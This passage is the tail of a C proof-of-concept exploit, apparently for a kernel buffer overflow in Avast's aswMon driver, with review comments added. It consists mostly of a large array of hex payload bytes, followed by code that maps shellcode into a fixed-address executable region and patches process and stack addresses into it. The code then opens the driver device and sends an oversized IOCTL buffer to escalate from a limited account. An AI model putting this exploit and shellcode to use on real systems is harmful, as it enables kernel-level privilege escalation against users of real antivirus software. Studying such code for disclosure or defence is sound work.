0x114f4794, 0xea4e637f, 0x723c4b76, 0x47cc4f6a, 0x87445530, 0xe83ceb38,
        0x4d3e048e, 0x79081724, 0x4bf787fb, 0x68943c66, 0x40e3d968, 0x6b103a30, 0xaadd17d4, 0xb3f839e8, 0xac84edf7, 0x931d53b1, 0x0c4d2a0e, 0x2f6ce387, 0xfed92391, 0x69ee2a6e, 0x48d7bb98, 0x0ba1cb35, 0x63e12f67, 0x1ce3cb82, 0x099b3a46, 0x5839b9a4, 0x7f7f4993, 0x59e4ecea, 0xeea5cccd, 0x447dbf7f, 0xcd8626e1, 0x8d36d4b0, 0xac9e19ec, 0x797ab5d7, 0x8434b658, 0xbcec7ef7, 0x682c6d93, 0x762d7c86, 0xf38c8099, 0xafdec42c, 0xc43d09a6, 0xe49d1217, 0x5e747fe1, 0x24788bb3, 0xaefc2937, 0x1932f03c, 0x683917c0, 0x66aeed2b, 0x9b18cdd7, 0x33f680a8, 0x26951569, 0xbaee16a8, 0x9e6c211f, 0x2588853b, 0x9f46290f, 0x246ae851, 0x18e204f6, 0x4904ec8f, 0xd90aa3f4, 0xb32d3c27, 0x4c5dc284, 0xbe4add7f, 0x43d09da9, 0x89c17c35, 0x073879e7, 0xa563a12e, 0x8a89202c, 0xf15e9e1f, 0x351c54d9, 0xa0c4fa14, 0x5709de8d, 0x39186894, 0x6d04f1d9, 0xf11330f7, 0x81d6fb36, 0xa9ed69cb, 0xc6d525a7, 0x7a95ed1d, 0x0e3cc7ca, 0xf22396d8, 0x454bc69f, 0x220c180f, 0x413b363d, 0x3034f3b4, 0xd29d8cf2, 0x54f88e88, 0x48701702, 0xd3bc5e71, 0x7d13dd70, 0x3c60d934, 0x2f11eff3, 0xc0bfff93, 0xfa8a47f7, 0x1ae1ec5d, 0xc5ebdc87, 0xe0f9d5ac, 0xf205ec31, 0x45bf5abb, 0x364757d1, 0xe17d0824, 0x7285cdad, 0x340f876f, 0xafd04fb5, 0x232b2753, 0x9ed7abb0, 0xf6fa5267, 0xd0344840, 0x7e1908c7, 0xa7fa0e2a, 0xa14a1f1c, 0x207f4d88, 0x3a8e8949, 0x0933e39b, 0x49308b91, 0x744b2e05, 0x8dd691b5, 0x576003b6, 0x74bf728b, 0x8ec344ea, 0x5c1a8d38, 0xba05b772, 0xd025c49e, 0xbe9bde06, 0x791d3fde, 0xaac66591, 0x4fd06cb7, 0x1eb57393, 0x3a132e66, 0x531bed33, 0xc1161373, 0x584522c2, 0x96427532, 0x9b324e67, 0x67fd675e, 0x1ca506c6, 0xfec4ce3f, 0xdfbd6229, 0x1570062a, 0xaf2e42ce, 0x442de8ae, 0xe9da28c2, 0xd8661dd6, 0xb1fbabfd, 0x5e3b5bd4, 0x5975312a, 0x727c7734, 0x6edaf6d6, 0xc1c54cf1, 0x0a906333, 0x81c044d6, 0x38ea12fe, 0x0c1bf270, 0x57818362, 0x0908d11c, 0x0e5a84ec, 0xadc85814, 0x54e8aa92, 0xd07c83f7, 0xcc71c686, 0x640e2cbb, 0x03c636a6, 0x47737c01, 0x9ad77ee7, 0xd179e1a9, 0x8340bb15, 0x489ed205, 0x40b54fa8, 0x7afb505e, 0xc04f8e16, 0xb92981c6, 0x604af99f, 0x43c0fd25,
        0x1d2b625f, 0x13f4dcd7, 0xcf47b89b, 0x108d824a, 0x21236797, 0x4cac84a5, 0xb33821ce, 0x542a9975, 0xf66135c2, 0x30b9634a, 0x9bde472a, 0x50e29c43, 0x1224e64d, 0x140aa049, 0x48c6d7eb, 0xf171704c, 0x80987f37, 0x88da2c1d, 0xf337fbfe, 0xd52f414a, 0x76581549, 0x75d22530, 0x293f3f41, 0x20b6cf21, 0xccd9f240, 0x46ddeacd, 0x4e16d64e, 0x0e64fe89, 0x445de8d3, 0x4d7983a6, 0x9f44fe8c, 0xf4e56281, 0xa7aad55b, 0x07270a01, 0x77501d16, 0xf848ee54, 0x34f4ba27, 0x244da047, 0x0ca62989, 0xbb5e2e05, 0x9612ca12, 0x1b7c8cc7, 0xd2d672e6, 0x0caac1da, 0x1ae2cf8a, 0x92bd47e9, 0xfeb1f194, 0xc0628cbd, 0xecc1a399, 0x1a9f95f0, 0x29648b2b, 0x9c447a54, 0xad6d85e2, 0x9bd983e7, 0x880f0eb1, 0xbea4a1a9, 0x3717e013, 0x89e486dd, 0xe86bcc12, 0xc43fe5a5, 0xc50a72b4, 0x396f4517, 0x2c8b865e, 0x3f022a7f, 0x0c5bc9bb, 0x13fd077b, 0xcb6bd83d, 0x20c3e64b, 0x254e3a66, 0xbcb22492, 0x57caa096, 0x8ba670d9, 0x547d5784, 0xec8bf3f8, 0xf5b1ff55, 0x30620957, 0x43a3264a, 0xdc6a0482, 0x270f2162, 0x15518268, 0xf4f3d923, 0xfc6cdb9e, 0x91d3e097, 0xe49d4ba4, 0xe47a3b34, 0xc18383a6, 0x5508af9a, 0xf2c8fcc8, 0xed417653, 0xe3f4cf27, 0x6a777f65, 0xe9c3dae6, 0xfec2e74c, 0x143f7e6d, 0xa8dc757c, 0xb8c48b07, 0x6a41964d, 0x0994e2e4, 0x86ba5562, 0x4ebdb204, 0x6913dc92, 0x3bd205a8, 0x2018395a, 0x804c5bb8, 0xa159fa18, 0x7ccdfb1e, 0x146c6abc, 0x9c59a9ce, 0xe2f7d37d, 0x699918e3, 0xde22536a, 0xfae6dd7c, 0x8a228eab, 0xf657ae31, 0x97d59acb, 0xb1f6e1b7, 0xbc41be1c, 0xc2572c95, 0x342f56a9, 0x349aeff3, 0xcbe3c7d9, 0x080d46fe, 0x0e1d753c, 0xe4760d5c, 0x0cde715c, 0x7d129f23, 0xab63fbbe, 0x9d734af8, 0xc2daebce, 0x0619e8ee, 0x2c5b3a41, 0xd5db4193, 0x943fce43, 0x0256feeb, 0x83a424bd, 0xe27f259b, 0x67ef724b, 0x99c97ae1, 0x8bfa552e, 0x73e3191c, 0xe94365e5, 0x92291d29, 0x7a28b911, 0x4ae8b691, 0xafba0345, 0xbac0a0ba, 0x677713c2, 0x1a7fc599, 0x8978a9c1, 0xe8f62f56, 0x58f7969a };
    DWORD ShellcodeToExecute;                        /* assigned twice below, never read */
    int choix;                                       /* unused */
    memset(welcome, 0x61, 100);                      /* welcome/out are filled but never used */
    welcome[100] = 0;
    ZeroMemory(out,sizeof(out));
    printf("Avast Kernel Buffer Overflow Vulnerability\nProof Of Concept...\n\n");
    getch();
    /* Patch the three placeholders in ShellcodeMaster (PID, payload address, stack address). */
    MajShellcode("LocalEscalation_Avast.exe");
    MajRealShellcode();
    MajRealStack();
    /* Fixed-address RWX region: reserved, then committed; neither result is checked. */
    ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x57520000, 0x10000, MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x57520000, 0x10000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy((void*)0x57523c00, UpdateAswMon, sizeof(UpdateAswMon));
    memcpy((void*)0x57523c00+sizeof(UpdateAswMon), ShellcodeMaster, sizeof(ShellcodeMaster));  /* (void*) arithmetic: GCC extension */
    printf("Connecting... ");
    /* Open the filter driver's device object. That this succeeds from a limited
     * user account is the first of the two conditions the report depends on. */
    hDevice = CreateFile("\\\\.\\aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
    while(hDevice == (HANDLE) 0xffffffff){           /* retry every second until the open succeeds */
        hDevice = CreateFile("\\\\.\\aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
        Sleep(1000);
    }
    printf("Found !\nHandle : %p\n",hDevice);
    /* IOCTL 0xb2c8000c with the whole Crashing array as input and no output
     * buffer, issued twice; return values are not checked. From the driver's side
     * the fix is to validate the input length in this IOCTL's dispatch routine. */
    DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL);
    DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL);
    AfficherListeFichiers();
    printf("Written.\n");                            /* printed regardless of the IOCTL results */
    CloseHandle(hDevice);
    getch();
    return 0;
}